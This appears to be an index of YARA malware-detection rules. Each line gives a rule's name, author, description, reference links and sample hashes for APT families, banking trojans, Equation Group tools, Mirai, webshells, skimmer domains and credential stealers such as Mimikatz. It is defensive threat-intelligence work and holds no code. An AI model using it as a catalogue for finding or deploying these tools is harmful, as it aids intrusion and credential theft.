malware_index SLServer_command_and_control author: Matt Brooks, @cmatthewbrooks desc: Searches for the C2 server. ref: https://citizenlab.org/2016/04/between-hong-kong-and-burma/
malware_index SLServer_campaign_code author: Matt Brooks, @cmatthewbrooks desc: Searches for the related campaign code. ref: https://citizenlab.org/2016/04/between-hong-kong-and-burma/
malware_index SLServer_unknown_string author: Matt Brooks, @cmatthewbrooks desc: Searches for a unique string. ref: https://citizenlab.org/2016/04/between-hong-kong-and-burma/
malware_index Unit78020_Malware_Gen1 description: Detects malware by Chinese APT PLA Unit 78020 - Generic Rule author: Florian Roth reference: http://threatconnect.com/camerashy/?utm_campaign=CameraShy date: 2015-09-24 hash1: 2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72 hash2: 76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd hash3: 2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac hash4: 5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2 hash5: 7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af hash6: 88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790
malware_index WaterBug_wipbot_2013_dll description: Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component author: Symantec Security Response date: 22.01.2015 reference: http://t.co/rF35OaAXrl
malware_index WaterBug_wipbot_2013_core description: Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error author: Symantec Security Response date: 22.01.2015 reference: http://t.co/rF35OaAXrl
malware_index WaterBug_turla_dropper description: Symantec Waterbug Attack - Trojan Turla Dropper author: Symantec Security Response date: 22.01.2015 reference: http://t.co/rF35OaAXrl
malware_index WaterBug_fa_malware description: Symantec Waterbug Attack - FA malware variant author: Symantec Security Response date: 22.01.2015 reference: http://t.co/rF35OaAXrl
malware_index WaterBug_sav description: Symantec Waterbug Attack - SAV Malware author: Symantec Security Response date: 22.01.2015 reference: http://t.co/rF35OaAXrl
malware_index onimiki description: Linux/Onimiki malicious DNS server malware: Linux/Onimiki operation: Windigo author: Olivier Bilodeau <bilodeau@eset.com> created: 2014-02-06 reference: http://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf contact: windigo@eset.sk source: https://github.com/eset/malware-ioc/ license: BSD 2-Clause
malware_index WinntiPharma author: Jose Ramon Palanco copyright: Drainware, Inc. date: 2015-06-23 description: Backdoor Win64 Winnti Pharma ref: https://securelist.com/blog/research/70991/games-are-over/
malware_index WoolenGoldfish_Generic_3 description: Detects an operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ author: Florian Roth reference: http://goo.gl/NpJpVZ date: 2015/03/25 score: 90 hash1: 86222ef166474e53f1eb6d7e6701713834e6fee7 hash2: e8dbcde49c7f760165ebb0cb3452e4f1c24981f5
malware_index EquationGroup_elgingamble description: Equation Group hack tool leaked by ShadowBrokers- file elgingamble author: Florian Roth reference: https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 date: 2017-04-08 hash1: 0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd
malware_index EquationGroup_sambal description: Equation Group hack tool leaked by ShadowBrokers- file sambal author: Florian Roth reference: https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 date: 2017-04-08 hash1: 2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec
malware_index EquationGroup__jparsescan_parsescan_5 description: Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan author: Florian Roth reference: https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 date: 2017-04-08 super_rule: 1 hash1: 8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984 hash2: 942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef
malware_index EquationGroup_Toolset_Apr17_Gen2 description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 super_rule: 1 hash1: 7fe425cd040608132d4f4ab2671e04b340a102a20c97ffdcf1b75be43a9369b5 hash2: 561c0d4fc6e0ff0a78613d238c96aed4226fbb7bb9ceea1d19bc770207a6be1e hash3: f2e90e04ddd05fa5f9b2fec024cd07365aebc098593d636038ebc2720700662b hash4: 8f7e10a8eedea37ee3222c447410fd5b949bd352d72ef22ef0b2821d9df2f5ba
malware_index EquationGroup_Toolset_Apr17_ntevt description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 hash1: 4254ee5e688fc09bdc72bcc9c51b1524a2bb25a9fb841feaf03bc7ec1a9975bf
malware_index EquationGroup_Toolset_Apr17_EXPA description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 hash1: 2017176d3b5731a188eca1b71c50fb938c19d6260c9ff58c7c9534e317d315f8
malware_index EquationGroup_Toolset_Apr17_DiBa_Target_BH description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 hash1: 7ae9a247b60dc31f424e8a7a3b3f1749ba792ff1f4ba67ac65336220021fce9f
malware_index EquationGroup_Toolset_Apr17_DiBa_Target description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 hash1: ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6
malware_index EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 hash1: 9ab667b7b5b9adf4ff1d6db6f804824a22c7cc003eb4208d5b2f12809f5e69d0 hash2: 320144a7842500a5b69ec16f81a9d1d4c8172bb92301afd07fb79bc0eca81557 hash3: c10f4b9abee0fde50fe7c21b9948a2532744a53bb4c578630a81d2911f6105a3 hash4: 551174b9791fc5c1c6e379dac6110d0aba7277b450c2563e34581565609bc88e hash5: 8419866c9058d738ebc1a18567fef52a3f12c47270f2e003b3e1242d86d62a46
malware_index EquationGroup_Toolset_Apr17__vtuner_vtuner_1 description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 super_rule: 1 hash1: 3e6bec0679c1d8800b181f3228669704adb2e9cbf24679f4a1958e4cdd0e1431 hash2: b0d2ebf455092f9d1f8e2997237b292856e9abbccfbbebe5d06b382257942e0e
malware_index EquationGroup_Toolset_Apr17__ELV_ESKE_ETBL_ETRE_EVFR_11 description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 super_rule: 1 hash1: f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f hash2: 9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556 hash3: 70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef hash4: e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2 hash5: c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674
malware_index COZY_FANCY_BEAR_pagemgr_Hunt description: Detects a pagemgr.exe as mentioned in the CrowdStrike report author: Florian Roth reference: https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ date: 2016-06-14
malware_index Furtim_nativeDLL description: Detects Furtim malware - file native.dll author: Florian Roth reference: MISP 3971 date: 2016-06-13 hash1: 4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948
malware_index GEN_PowerShell description: Generic PowerShell Malware Rule author: https://github.com/interleaved
malware_index alina author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-08-09 description: Identify Alina
malware_index Worm_Gamarue author: Centro Criptológico Nacional (CCN) ref: https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html description: Gamarue_Andromeda
malware_index AthenaHTTP author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-08-09 description: Identify Athena HTTP
malware_index AthenaHTTP_v2 author: Jason Jones <jasonjones@arbor.net> description: Athena HTTP identification source: https://github.com/arbor/yara/blob/master/athena.yara
malware_index AthenaIRC author: Jason Jones <jasonjones@arbor.net> description: Athena IRC v1.8.x, 2.x identification source: https://github.com/arbor/yara/blob/master/athena.yara
malware_index Atmos_Builder description: Generic signature for Hacktool.Atmos.Builder cracked version author: xylitol@temari.fr reference: http://www.xylibox.com/2016/02/citadel-0011-atmos.html date: 20/08/2016
malware_index backoff author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-08-21 description: Identify Backoff
malware_index BangatCode description: Bangat code features author: Seth Hardy last_modified: 2014-07-10
malware_index BangatStrings description: Bangat Identifying Strings author: Seth Hardy last_modified: 2014-07-10
malware_index Bangat description: Bangat author: Seth Hardy last_modified: 2014-07-10
malware_index BlackRev author: Dennis Schwarz date: 2013-05-21 description: Black Revolution DDoS Malware. http://www.arbornetworks.com/asert/2013/05/the-revolution-will-be-written-in-delphi/ origin: https://github.com/arbor/yara/blob/master/blackrev.yara
malware_index BlackWorm author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2015-05-20 description: Identify BlackWorm
malware_index BoousetCode description: Boouset code tricks author: Seth Hardy last_modified: 2014-06-19
malware_index Bublik author: Kevin Falcoz date: 29/09/2013 description: Bublik Trojan Downloader
malware_index CAP_HookExKeylogger author: Brian C. Bell -- @biebsmalwareguy reference: https://github.com/DFIRnotes/rules/blob/master/CAP_HookExKeylogger.yar
malware_index ChickenDOS_Linux author: Jason Jones <jasonjones@arbor.net> description: Linux-variant of Chicken ident for both dropper and dropped file source: https://github.com/arbor/yara/blob/master/chicken.yara
malware_index citadel13xy author: Jean-Philippe Teissier / @Jipe_ description: Citadel 1.5.x.y trojan banker date: 2013-01-12 version: 1.0 filetype: memory
malware_index Citadel_Malware author: xylitol@temari.fr date: 2015-10-08 description: Search for nss3.dll pattern indicating an hexed copy of Citadel malware to work on firefox > v23.0
malware_index CookiesStrings description: Cookies Identifying Strings author: Seth Hardy last_modified: 2014-06-20
malware_index Cookies description: Cookies author: Seth Hardy last_modified: 2014-06-20
malware_index cxpidStrings description: cxpid Identifying Strings author: Seth Hardy last_modified: 2014-06-23
malware_index cxpidCode description: cxpid code features author: Seth Hardy last_modified: 2014-06-23
malware_index Cythosia author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2015-03-21 description: Identify Cythosia
malware_index DDosTf author: benkow_ - MalwareMustDie reference: http://blog.malwaremustdie.org/2016/01/mmd-0048-2016-ddostf-new-elf-windows.html description: Rule to detect ELF.DDosTf infection
malware_index Derkziel description: Derkziel info stealer (Steam, Opera, Yandex, ...) author: The Malware Hunter filetype: pe date: 2015-11 md5: f5956953b7a4acab2e6fa478c0015972 site: https://zoo.mlw.re/samples/f5956953b7a4acab2e6fa478c0015972 reference: https://bhf.su/threads/137898/
malware_index dexter_strings author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-09-10 description: Identify Dexter POSGrabber
malware_index diamond_fox author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2015-08-22 description: Identify DiamondFox
malware_index Trj_Elex_Installer author: Centro Criptológico Nacional (CCN) description: Elex Installer ref: https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
malware_index Trj_Elex_Service64 author: Centro Criptológico Nacional (CCN) description: Elex Service 64 bits ref: https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
malware_index Empire_Get_SecurityPackages description: Detects Empire component - file Get-SecurityPackages.ps1 author: Florian Roth reference: https://github.com/adaptivethreat/Empire date: 2016-11-05 hash1: 5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1
malware_index Empire_Invoke_EgressCheck description: Detects Empire component - file Invoke-EgressCheck.ps1 author: Florian Roth reference: https://github.com/adaptivethreat/Empire date: 2016-11-05 hash1: e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534
malware_index Empire_PowerShell_Framework_Gen2 description: Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-DCSync.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1, Invoke-ReflectivePEInjection.ps1 author: Florian Roth reference: https://github.com/adaptivethreat/Empire date: 2016-11-05 super_rule: 1 hash1: 1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8 hash3: a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28 hash5: 4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3 hash6: 61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4 hash8: eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5
malware_index Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen description: Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1 author: Florian Roth reference: https://github.com/adaptivethreat/Empire date: 2016-11-05 super_rule: 1 hash1: 1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8 hash2: 4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3
malware_index EnfalCode description: Enfal code tricks author: Seth Hardy last_modified: 2014-06-19
malware_index EnfalStrings description: Enfal Identifying Strings author: Seth Hardy last_modified: 2014-06-19
malware_index Enfal description: Enfal author: Seth Hardy last_modified: 2014-06-19
malware_index Win7Elevatev2 description: Detects Win7Elevate - Windows UAC bypass utility author: Florian Roth reference: http://www.pretentiousname.com/misc/W7E_Source/Win7Elevate_Inject.cpp.html date: 2015-05-14 hash1: 4f53ff6a04e46eda92b403faf42219a545c06c29 hash2: 808d04c187a524db402c5b2be17ce799d2654bd1 score: 60
malware_index UACME_Akagi description: Rule to detect UACMe - abusing built-in Windows AutoElevate backdoor author: Florian Roth reference: https://github.com/hfiref0x/UACME date: 2015-05-14 hash1: edd2138bbd9e76c343051c6dc898054607f2040a hash2: e3a919ccc2e759e618208ededa8a543954d49f8a score: 60
malware_index EzcobStrings description: Ezcob Identifying Strings author: Seth Hardy last_modified: 2014-06-23
malware_index Ezcob description: Ezcob author: Seth Hardy last_modified: 2014-06-23
malware_index ws_f0xy_downloader description: f0xy malware downloader author: Nick Griffin (Websense)
malware_index FavoriteCode description: Favorite code features author: Seth Hardy last_modified: 2014-06-24
malware_index FavoriteStrings description: Favorite Identifying Strings author: Seth Hardy last_modified: 2014-06-24
malware_index genome author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-09-07 description: Identify Genome
malware_index GlassesCode description: Glasses code features author: Seth Hardy last_modified: 2014-07-22
malware_index Glasses description: Glasses family author: Seth Hardy last_modified: 2014-07-22
malware_index GoziRule description: Win32.Gozi author: CCN-CERT version: 1.0 ref: https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
malware_index Grozlex author: Kevin Falcoz date: 20/08/2013 description: Grozlex Stealer - Possible HCStealer
malware_index Hsdfihdf author: Adam Ziaja <adam@adamziaja.com> http://adamziaja.com date: 2014-04-06 description: Polish banking malware hash0: db1675c74a444fd35383d9a45631cada hash1: f48ba39df38056449a3e9a1a7289f657 filetype: exe
malware_index IMulerCode description: IMuler code tricks author: Seth Hardy last_modified: 2014-06-16
malware_index IMulerStrings description: IMuler Identifying Strings author: Seth Hardy last_modified: 2014-06-16
malware_index IMuler description: IMuler author: Seth Hardy last_modified: 2014-06-16
malware_index iexpl0reCode description: iexpl0re code features author: Seth Hardy last_modified: 2014-07-21
malware_index iexpl0reStrings description: Strings used by iexpl0re author: Seth Hardy last_modified: 2014-07-21
malware_index iexpl0re description: iexpl0re family author: Seth Hardy last_modified: 2014-07-21
malware_index Insta11Code description: Insta11 code features author: Seth Hardy last_modified: 2014-06-23
malware_index Insta11Strings description: Insta11 Identifying Strings author: Seth Hardy last_modified: 2014-06-23
malware_index Insta11 description: Insta11 author: Seth Hardy last_modified: 2014-06-23
malware_index Intel_Virtualization_Wizard_exe author: cabrel@zerklabs.com description: Dynamic DLL abuse executable file_1_seen: 2013-05-21 file_1_sha256: 7787757ae851f4a162f46f794be1532ab78e1928185212bdab83b3106f28c708
malware_index Intel_Virtualization_Wizard_dll author: cabrel@zerklabs.com description: Dynamic DLL (Malicious) file_1_seen: 2013-05-21 file_1_sha256: 485ae043b6a5758789f1d33766a26d8b45b9fde09cde0512aa32d4bd1ee04f28
malware_index KelihosHlux author: @malpush maltype: KelihosHlux description: http://malwared.ru date: 22/02/2014
malware_index korlia author: Nick Hoffman company: Morphick reference: http://www.morphick.com/resources/lab-blog/curious-korlia information: korlia malware found in apt dump
malware_index SharedStrings description: Internal names found in LURK0/CCTV0 samples author: Katie Kleemola last_updated: 07-22-2014
malware_index lateral_movement date: 3/12/2014 author: https://github.com/reed1713 description: methodology sig looking for signs of lateral movement
malware_index lost_door author: Kevin Falcoz date: 23/02/2013 description: Lost Door
malware_index LuckyCatCode description: LuckyCat code tricks author: Seth Hardy last_modified: 2014-06-19
malware_index MacControlCode description: MacControl code tricks author: Seth Hardy last_modified: 2014-06-17
malware_index MacControlStrings description: MacControl Identifying Strings author: Seth Hardy last_modified: 2014-06-17
malware_index MacControl description: MacControl author: Seth Hardy last_modified: 2014-06-16
malware_index dump_sales_quote_payment
malware_index dump_sales_order
malware_index md5_64651cede2467fdeb1b3b7e6ff3f81cb
malware_index md5_6bf4910b01aa4f296e590b75a3d25642
malware_index fopo_webshell
malware_index eval_post
malware_index spam_mailer
malware_index md5_2c37d90dd2c9c743c273cb955dd83ef6
malware_index md5_3ccdd51fe616c08daafd601589182d38
malware_index md5_4b69af81b89ba444204680d506a8e0a1
malware_index md5_71a7c769e644d8cf3cf32419239212c7
malware_index md5_87cf8209494eedd936b28ff620e28780
malware_index md5_fb9e35bf367a106d18eb6aa0fe406437
malware_index md5_8e5f7f6523891a5dcefcbb1a79e5bbe9
malware_index eval_base64_decode_a
malware_index md5_ab63230ee24a988a4a9245c2456e4874
malware_index md5_d30b23d1224438518d18e90c218d7c8b
malware_index md5_24f2df1b9d49cfb02d8954b08dba471f
malware_index md5_fd141197c89d27b30821f3de8627ac38
malware_index visbot
malware_index md5_4c4b3d4ba5bce7191a5138efa2468679
malware_index md5_6eb201737a6ef3c4880ae0b8983398a9
malware_index md5_d201d61510f7889f1a47257d52b15fa2
malware_index md5_06e3ed58854daeacf1ed82c56a883b04
malware_index md5_28690a72362e021f65bb74eecc54255e
malware_index fake_magentoupdate_site
malware_index md5_4aa900ddd4f1848a15c61a9b7acd5035
malware_index sinlesspleasure_com
malware_index amasty_biz
malware_index amasty_biz_js
malware_index cloudfusion_me
malware_index grelos_v
malware_index hacked_domains
malware_index jquery_code_su
malware_index jquery_code_su_multi
malware_index Trafficanalyzer_js
malware_index atob_js
malware_index googieplay_js
malware_index mag_php_js
malware_index thetech_org_js
malware_index md5_cdn_js_link_js
malware_index Trojan_W32_Gh0stMiancha_1_0_0 Author: Context Threat Intelligence Date: 2014/01/27 Description: Bytes inside Reference: http://www.contextis.com/documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf
malware_index Mirai_Generic_Arch description: Mirai Botnet TR-069 Worm - Generic Architecture author: Felipe Molina / @felmoltor date: 2016-12-04 version: 1.0 ref1: http://www.theregister.co.uk/2016/11/28/router_flaw_exploited_in_massive_attack/ ref2: https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759 ref3: https://krebsonsecurity.com/2016/11/new-mirai-worm-knocks-900k-germans-offline/
malware_index Mirai_4 description: Mirai Variant 4 author: Joan Soriano / @joanbtl date: 2017-04-16 version: 1.0 MD5: f832ef7a4fcd252463adddfa14db43fb SHA1: 4455d237aadaf28aafce57097144beac92e55110
malware_index Mirai_Dwnl description: Mirai Downloader author: Joan Soriano / @joanbtl date: 2017-04-16 version: 1.0 MD5: 85784b54dee0b7c16c57e3a3a01db7e6 SHA1: 6f6c625ef730beefbc23c7f362af329426607dee
malware_index Mirai_5 description: Mirai Variant 5 author: Joan Soriano / @joanbtl date: 2017-04-16 version: 1.0 MD5: 7e17c34cddcaeb6755c457b99a8dfe32 SHA1: b63271672d6a044704836d542d92b98e2316ad24
malware_index memory_pivy author: https://github.com/jackcr/
malware_index memory_shylock author: https://github.com/jackcr/
malware_index Cloaked_as_JPG description: Detects a cloaked file as JPG author: Florian Roth (eval section from Didier Stevens) date: 2015/02/29 score: 70
malware_index rtf_yahoo_ken author: @patrickrolsen maltype: Yahoo Ken filetype: RTF version: 0.1 description: Test rule date: 2013-12-14
malware_index ZXProxy author: ThreatConnect Intelligence Research Team
malware_index EmiratesStatement Author: Christiaan Beek Date: 2013-06-30 Description: Credentials Stealing Attack Reference: https://blogs.mcafee.com/mcafee-labs/targeted-campaign-steals-credentials-in-gulf-states-and-caribbean hash0: 0e37b6efe5de1cc9236017e003b1fc37 hash1: a28b22acf2358e6aced43a6260af9170 hash2: 6f506d7adfcc2288631ed2da37b0db04 hash3: 8aebade47dc1aa9ac4b5625acf5ade8f
malware_index SpyGate_v2_9 date: 2014/09 maltype: Spygate v2.9 Remote Access Trojan filetype: exe reference: https://blogs.mcafee.com/mcafee-labs/middle-east-developer-spygate-struts-stuff-online
malware_index qadars author: Jean-Philippe Teissier / @Jipe_ description: Qadars - Mobile part. Maybe Perkele. version: 1.0 filetype: memory ref1: http://www.lexsi-leblog.fr/cert/qadars-nouveau-malware-bancaire-composant-mobile.html
malware_index shylock author: Jean-Philippe Teissier / @Jipe_ description: Shylock Banker date: 2013-12-12 version: 1.0 ref1: http://iocbucket.com/iocs/1b4660d57928df5ca843c21df0b2adb117026cba ref2: http://www.trusteer.com/blog/merchant-fraud-returns-%E2%80%93-shylock-polymorphic-financial-malware-infections-rise ref3: https://www.csis.dk/en/csis/blog/3811/
malware_index spyeye author: Jean-Philippe Teissier / @Jipe_ description: SpyEye X.Y memory date: 2012-05-23 version: 1.0 filetype: memory
malware_index spyeye_plugins author: Jean-Philippe Teissier / @Jipe_ description: SpyEye X.Y Plugins memory date: 2012-05-23 version: 1.0 filetype: memory
malware_index callTogether_certificate Author: Fireeye Labs Date: 2014/11/03 Description: detects binaries signed with the CallTogether certificate Reference: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
malware_index qti_certificate Author: Fireeye Labs Date: 2014/11/03 Description: detects binaries signed with the QTI International Inc certificate Reference: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
malware_index DownExecute_A Author: PwC Cyber Threat Operations :: @tlansec Date: 2015/04/27 Description: Malware is often wrapped/protected, best to run on memory Reference: http://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html
malware_index Pandora author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Pandora maltype: Remote Access Trojan filetype: exe
malware_index Base64_encoded_Executable description: Detects an base64 encoded executable (often embedded) author: Florian Roth date: 2015-05-28 score: 50
malware_index Invoke_mimikittenz description: Detects Mimikittenz - file Invoke-mimikittenz.ps1 author: Florian Roth reference: https://github.com/putterpanda/mimikittenz date: 2016-07-19 score: 90 hash1: 14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a
malware_index LinuxAESDDoS Author: @benkow_ Date: 2014/09/12 Description: Strings inside Reference: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483
malware_index LinuxBillGates Author: @benkow_ Date: 2014/08/11 Description: Strings inside Reference: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429
malware_index LinuxElknot Author: @benkow_ Date: 2013/12/24 Description: Strings inside Reference: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099
malware_index LinuxMrBlack Author: @benkow_ Date: 2014/09/12 Description: Strings inside Reference: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483
malware_index LinuxTsunami Author: @benkow_ Date: 2014/09/12 Description: Strings inside Reference: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483
malware_index rootkit author: xorseed reference: https://stuff.rop.io/
malware_index exploit author: xorseed reference: https://stuff.rop.io/
malware_index NSFreeCode description: NSFree code features author: Seth Hardy last_modified: 2014-06-24
malware_index NSFreeStrings description: NSFree Identifying Strings author: Seth Hardy last_modified: 2014-06-24
malware_index NSFree description: NSFree author: Seth Hardy last_modified: 2014-06-24
malware_index NaikonCode description: Naikon code features author: Seth Hardy last_modified: 2014-06-25
malware_index NaikonStrings description: Naikon Identifying Strings author: Seth Hardy last_modified: 2014-06-25
malware_index Naikon description: Naikon author: Seth Hardy last_modified: 2014-06-25
malware_index nAspyUpdateCode description: nAspyUpdate code features author: Seth Hardy last_modified: 2014-07-14
malware_index nAspyUpdateStrings description: nAspyUpdate Identifying Strings author: Seth Hardy last_modified: 2014-07-14
malware_index nAspyUpdate description: nAspyUpdate author: Seth Hardy last_modified: 2014-07-14
malware_index NetpassStrings description: Identifiers for netpass variant author: Katie Kleemola last_updated: 2014-05-29
malware_index NetPass description: netpass variant author: Katie Kleemola last_updated: 2014-07-08
malware_index NetTravStrings description: Identifiers for NetTraveler DLL author: Katie Kleemola last_updated: 2014-05-20
malware_index NetTravExports description: Export names for dll component author: Katie Kleemola last_updated: 2014-05-20
malware_index NetTraveler description: Nettravelr author: Katie Kleemola last_updated: 2014-07-08
malware_index NionSpy description: Triggers on old and new variants of W32/NionSpy file infector reference: https://blogs.mcafee.com/mcafee-labs/taking-a-close-look-at-data-stealing-nionspy-file-infector
malware_index TROJAN_Notepad Author: RSA_IR Date: 4Jun13 File: notepad.exe v 1.1 MD5: 106E63DBDA3A76BEEB53A8BBD8F98927
malware_index Odinaff_swift author: @j0sm1 date: 2016/10/27 description: Odinaff malware reference: https://www.symantec.com/security_response/writeup.jsp?docid=2016-083006-4847-99 filetype: binary
malware_index OlyxCode description: Olyx code tricks author: Seth Hardy last_modified: 2014-06-19
malware_index OlyxStrings description: Olyx Identifying Strings author: Seth Hardy last_modified: 2014-06-19
malware_index Olyx description: Olyx author: Seth Hardy last_modified: 2014-06-19
malware_index pony author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-08-16 description: Identify Pony
malware_index PubSabCode description: PubSab code tricks author: Seth Hardy last_modified: 2014-06-19
malware_index PubSabStrings description: PubSab Identifying Strings author: Seth Hardy last_modified: 2014-06-19
malware_index PubSab description: PubSab author: Seth Hardy last_modified: 2014-06-19
malware_index PE_File_pyinstaller author: Didier Stevens (https://DidierStevens.com) description: Detect PE file produced by pyinstaller reference: https://isc.sans.edu/diary/21057
malware_index QuarianStrings description: Quarian Identifying Strings author: Seth Hardy last_modified: 2014-07-09
malware_index QuarianCode description: Quarian code features author: Seth Hardy last_modified: 2014-07-09
malware_index Quarian description: Quarian author: Seth Hardy last_modified: 2014-07-09
malware_index RegSubDatStrings description: RegSubDat Identifying Strings author: Seth Hardy last_modified: 2014-07-14
malware_index RegSubDat description: RegSubDat author: Seth Hardy last_modified: 2014-07-14
malware_index Retefe author: bartblaze description: Retefe
malware_index RooterCode description: Rooter code features author: Seth Hardy last_modified: 2014-07-10
malware_index Rooter description: Rooter author: Seth Hardy last_modified: 2014-07-10
malware_index RookieStrings description: Rookie Identifying Strings author: Seth Hardy last_modified: 2014-06-25
malware_index Rookie description: Rookie author: Seth Hardy last_modified: 2014-06-25
malware_index rovnix_downloader author: Intel Security description: Rovnix downloader with sinkhole checks reference: https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/
malware_index SafeNetCode description: SafeNet code features author: Seth Hardy last_modified: 2014-07-16
malware_index SafeNetStrings description: Strings used by SafeNet author: Seth Hardy last_modified: 2014-07-16
malware_index SafeNet description: SafeNet family
malware_index ScarhiknStrings description: Scarhikn Identifying Strings author: Seth Hardy last_modified: 2014-06-25
malware_index ScarhiknCode description: Scarhikn code features author: Seth Hardy last_modified: 2014-06-25
malware_index Scarhikn description: Scarhikn author: Seth Hardy last_modified: 2014-06-25
malware_index sendsafe author: J from THL <j@techhelplist.com> date: 2016/09 reference: http://pastebin.com/WPWWs406 version: 2 maltype: Spammer filetype: memory
malware_index CrowdStrike_Shamoon_DroppedFile description: Rule to detect Shamoon malware http://goo.gl/QTxohN reference: http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf
malware_index EldoS_RawDisk description: EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0) author: Florian Roth (with Binar.ly) reference: https://goo.gl/jKIfGB date: 2016-12-01 score: 50 hash1: 47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34 hash2: 394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b
